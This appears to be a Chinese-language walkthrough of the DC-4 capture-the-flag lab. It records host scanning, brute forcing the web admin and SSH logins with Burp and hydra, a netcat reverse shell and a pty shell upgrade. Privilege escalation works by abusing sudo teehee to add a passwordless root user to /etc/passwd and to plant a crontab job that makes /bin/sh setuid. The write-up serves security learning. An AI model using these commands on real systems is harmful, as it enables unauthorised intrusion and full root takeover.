进行基本的信息收集
- 进行目标ip的搜集:
arp-scan –interface eth0 192.168.1.0/24
-
进行目标端口的检测:
-
发现80端口,进行目标的访问:
然后利用BP来对admin进行密码的爆破:用户名:admin 密码:happy
发现存在命令执行漏洞
- 进行漏洞利用:
使用nc进行shell的反弹
在目标靶机中进行信息收集
- 使用python打开交互式提示符
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 开始进行目标的信息收集:
whoami
- 进行有效信息的搜索与查看:
- 发现了一堆密码,利用hydra来进行用户密码的爆破:
touch username.txt //将三个用户放入
touch DC4passwd.txt //将所有密码导入
hydra -L username.txt -P DC4passwd.txt -t 6 ssh://192.168.1.66 //开始爆破
- 进行Jim用户的登录:
登录时提示有邮件,进行查看:
发现用户charles密码:
登录charles用户:
提权
- 进行权限的查看:
sudo -l
find / -perm -u=s -type f 2>/dev/null
- 创建用户拥有root权限
echo "ac::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
用户名:密码:uid:gid:属组:家目录:解释器
权限提升
- 利用teehee可以向任意文件写入的特性,向crontab中写入定时任务
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
//时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。
参考文章:https://laosec.cn/2021/05/12/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_4/
参考文章:https://blog.csdn.net/qq_41901122/article/details/103802994